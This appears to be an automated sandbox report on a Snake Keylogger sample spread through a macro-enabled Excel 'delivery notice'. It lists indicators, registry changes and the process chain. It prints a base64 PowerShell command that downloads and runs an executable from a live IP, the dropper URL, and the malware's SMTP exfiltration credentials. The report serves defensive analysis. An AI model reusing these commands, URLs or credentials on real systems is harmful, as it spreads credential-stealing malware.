snakekeylogger | 81dc79b21940ab4d94fb07cdfc337eaf3879fc4a7ad4eb71751f3c0eaa41061b

Analysis

max time kernel
121s
max time network
123s
platform
windows7_x64
resource
win7-en-20210920
submitted
21-10-2021 05:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

delivery noticefNQSE5.xlsm
Size

389KB
MD5

cf4c3f1e0953167d484fb25ac961db42
SHA1

d946a7e52728e50d6013a65bc0eb008b42b83787
SHA256

81dc79b21940ab4d94fb07cdfc337eaf3879fc4a7ad4eb71751f3c0eaa41061b
SHA512

d83bbff65e3d4d005b405c15708fb41967049ea7dcb059db2ea4b9b4f82a96c490088a91928f85640942ed37a7ff07e5d6391d98ad2c714bb9ab9db2a1331a8e

Score

10^/10

snakekeylogger collection keylogger persistence spyware stealer

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://3.64.251.139/vr/r/QA4ty2uUkTCD2tfNQSE5.exe

Extracted

Family

snakekeylogger

Credentials

Protocol: smtp
Host:
smtp.efinancet.shop
Port:
587
Username:
techvalley@efinancet.shop
Password:
EmeN]m^8=-oI

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	576	1768	cmd.exe	EXCEL.EXE

Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
stealer keylogger snakekeylogger
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

4 1972 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 4 IoCs

Processes:

Qxwhhwxztatczrimdt.exeQxwhhwxztatczrimdt.exeQxwhhwxztatczrimdt.exeQxwhhwxztatczrimdt.exe

pid process

1256 Qxwhhwxztatczrimdt.exe
1752 Qxwhhwxztatczrimdt.exe
1740 Qxwhhwxztatczrimdt.exe
1624 Qxwhhwxztatczrimdt.exe
Deletes itself 1 IoCs

Processes:

EXCEL.EXE

pid process

1768 EXCEL.EXE
Loads dropped DLL 4 IoCs

Processes:

powershell.exeQxwhhwxztatczrimdt.exe

pid process

1972 powershell.exe
1256 Qxwhhwxztatczrimdt.exe
1256 Qxwhhwxztatczrimdt.exe
1256 Qxwhhwxztatczrimdt.exe
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

flow	pid	process
4	1972	powershell.exe

pid	process
1256	Qxwhhwxztatczrimdt.exe
1752	Qxwhhwxztatczrimdt.exe
1740	Qxwhhwxztatczrimdt.exe
1624	Qxwhhwxztatczrimdt.exe

pid	process
1768	EXCEL.EXE

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

Processes:

Qxwhhwxztatczrimdt.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Qxwhhwxztatczrimdt.exe
Key opened	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Qxwhhwxztatczrimdt.exe
Key opened	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Qxwhhwxztatczrimdt.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Qxwhhwxztatczrimdt.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Windows\CurrentVersion\Run\note = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\office\\note.exe\""	Qxwhhwxztatczrimdt.exe

Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

6 checkip.dyndns.org
11 freegeoip.app
12 freegeoip.app
Suspicious use of SetThreadContext 1 IoCs

Processes:

Qxwhhwxztatczrimdt.exe

description pid process target process

PID 1256 set thread context of 1624 1256 Qxwhhwxztatczrimdt.exe Qxwhhwxztatczrimdt.exe
Office loads VBA resources, possible macro or embedded object present
Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry
T1012

System Information Discovery
T1082

Processes:

EXCEL.EXE

description ioc process

Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE

flow	ioc
6	checkip.dyndns.org
11	freegeoip.app
12	freegeoip.app

description	pid	process	target process
PID 1256 set thread context of 1624	1256	Qxwhhwxztatczrimdt.exe	Qxwhhwxztatczrimdt.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 31 IoCs

adware spyware

Modify Registry

T1112

Processes:

EXCEL.EXE

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Toolbar	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	EXCEL.EXE

Modifies registry class 64 IoCs

Processes:

EXCEL.EXE

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\""	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ = "&Open"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ = "&Open"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\ShellEx	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\ = "&Edit"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]"	EXCEL.EXE

NTFS ADS 1 IoCs

Processes:

EXCEL.EXE

description ioc process

File created C:\Users\Admin\AppData\Local\Temp\B8D57F00\:Zone.Identifier:$DATA EXCEL.EXE
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

1768 EXCEL.EXE

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Temp\B8D57F00\:Zone.Identifier:$DATA	EXCEL.EXE

pid	process
1768	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 14 IoCs

Processes:

powershell.exeQxwhhwxztatczrimdt.exeQxwhhwxztatczrimdt.exe

pid	process
1972	powershell.exe
1972	powershell.exe
1972	powershell.exe
1256	Qxwhhwxztatczrimdt.exe
1256	Qxwhhwxztatczrimdt.exe
1256	Qxwhhwxztatczrimdt.exe
1256	Qxwhhwxztatczrimdt.exe
1256	Qxwhhwxztatczrimdt.exe
1256	Qxwhhwxztatczrimdt.exe
1256	Qxwhhwxztatczrimdt.exe
1256	Qxwhhwxztatczrimdt.exe
1256	Qxwhhwxztatczrimdt.exe
1256	Qxwhhwxztatczrimdt.exe
1624	Qxwhhwxztatczrimdt.exe

Suspicious behavior: RenamesItself 1 IoCs

Processes:

EXCEL.EXE

pid process

1768 EXCEL.EXE

pid	process
1768	EXCEL.EXE

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exeQxwhhwxztatczrimdt.exeQxwhhwxztatczrimdt.exe

description	pid	process
Token: SeDebugPrivilege	1972	powershell.exe
Token: SeDebugPrivilege	1256	Qxwhhwxztatczrimdt.exe
Token: SeDebugPrivilege	1624	Qxwhhwxztatczrimdt.exe

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

EXCEL.EXE

pid process

1768 EXCEL.EXE
1768 EXCEL.EXE
1768 EXCEL.EXE
1768 EXCEL.EXE

pid	process
1768	EXCEL.EXE
1768	EXCEL.EXE
1768	EXCEL.EXE
1768	EXCEL.EXE

Suspicious use of WriteProcessMemory 29 IoCs

Processes:

EXCEL.EXEcmd.exepowershell.exeQxwhhwxztatczrimdt.exe

description	pid	process	target process
PID 1768 wrote to memory of 576	1768	EXCEL.EXE	cmd.exe
PID 1768 wrote to memory of 576	1768	EXCEL.EXE	cmd.exe
PID 1768 wrote to memory of 576	1768	EXCEL.EXE	cmd.exe
PID 1768 wrote to memory of 576	1768	EXCEL.EXE	cmd.exe
PID 576 wrote to memory of 1972	576	cmd.exe	powershell.exe
PID 576 wrote to memory of 1972	576	cmd.exe	powershell.exe
PID 576 wrote to memory of 1972	576	cmd.exe	powershell.exe
PID 576 wrote to memory of 1972	576	cmd.exe	powershell.exe
PID 1972 wrote to memory of 1256	1972	powershell.exe	Qxwhhwxztatczrimdt.exe
PID 1972 wrote to memory of 1256	1972	powershell.exe	Qxwhhwxztatczrimdt.exe
PID 1972 wrote to memory of 1256	1972	powershell.exe	Qxwhhwxztatczrimdt.exe
PID 1972 wrote to memory of 1256	1972	powershell.exe	Qxwhhwxztatczrimdt.exe
PID 1256 wrote to memory of 1752	1256	Qxwhhwxztatczrimdt.exe	Qxwhhwxztatczrimdt.exe
PID 1256 wrote to memory of 1752	1256	Qxwhhwxztatczrimdt.exe	Qxwhhwxztatczrimdt.exe
PID 1256 wrote to memory of 1752	1256	Qxwhhwxztatczrimdt.exe	Qxwhhwxztatczrimdt.exe
PID 1256 wrote to memory of 1752	1256	Qxwhhwxztatczrimdt.exe	Qxwhhwxztatczrimdt.exe
PID 1256 wrote to memory of 1740	1256	Qxwhhwxztatczrimdt.exe	Qxwhhwxztatczrimdt.exe
PID 1256 wrote to memory of 1740	1256	Qxwhhwxztatczrimdt.exe	Qxwhhwxztatczrimdt.exe
PID 1256 wrote to memory of 1740	1256	Qxwhhwxztatczrimdt.exe	Qxwhhwxztatczrimdt.exe
PID 1256 wrote to memory of 1740	1256	Qxwhhwxztatczrimdt.exe	Qxwhhwxztatczrimdt.exe
PID 1256 wrote to memory of 1624	1256	Qxwhhwxztatczrimdt.exe	Qxwhhwxztatczrimdt.exe
PID 1256 wrote to memory of 1624	1256	Qxwhhwxztatczrimdt.exe	Qxwhhwxztatczrimdt.exe
PID 1256 wrote to memory of 1624	1256	Qxwhhwxztatczrimdt.exe	Qxwhhwxztatczrimdt.exe
PID 1256 wrote to memory of 1624	1256	Qxwhhwxztatczrimdt.exe	Qxwhhwxztatczrimdt.exe
PID 1256 wrote to memory of 1624	1256	Qxwhhwxztatczrimdt.exe	Qxwhhwxztatczrimdt.exe
PID 1256 wrote to memory of 1624	1256	Qxwhhwxztatczrimdt.exe	Qxwhhwxztatczrimdt.exe
PID 1256 wrote to memory of 1624	1256	Qxwhhwxztatczrimdt.exe	Qxwhhwxztatczrimdt.exe
PID 1256 wrote to memory of 1624	1256	Qxwhhwxztatczrimdt.exe	Qxwhhwxztatczrimdt.exe
PID 1256 wrote to memory of 1624	1256	Qxwhhwxztatczrimdt.exe	Qxwhhwxztatczrimdt.exe

outlook_office_path 1 IoCs

Processes:

Qxwhhwxztatczrimdt.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Qxwhhwxztatczrimdt.exe

outlook_win_path 1 IoCs

Processes:

Qxwhhwxztatczrimdt.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Qxwhhwxztatczrimdt.exe

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\delivery noticefNQSE5.xlsm"
1⤵
- Deletes itself
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Modifies registry class
- NTFS ADS
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: RenamesItself
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1768

C:\Windows\SysWOW64\cmd.exe
cmd /c Qtkkhrqfym.bat
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:576

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -win 1 -enc JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBRAHgAdwBoAGgAdwB4AHoAdABhAHQAYwB6AHIAaQBtAGQAdAAuAGUAeABlACIAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAIgBoAHQAdABwADoALwAvADMALgA2ADQALgAyADUAMQAuADEAMwA5AC8AdgByAC8AcgAvAFEAQQA0AHQAeQAyAHUAVQBrAFQAQwBEADIAdABmAE4AUQBTAEUANQAuAGUAeABlACIALAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAJABQAHIAbwBjAE4AYQBtAGUAIgApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACgAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcACQAUAByAG8AYwBOAGEAbQBlACIAKQA=
3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1972

C:\Users\Admin\AppData\Roaming\Qxwhhwxztatczrimdt.exe
"C:\Users\Admin\AppData\Roaming\Qxwhhwxztatczrimdt.exe"
4⤵
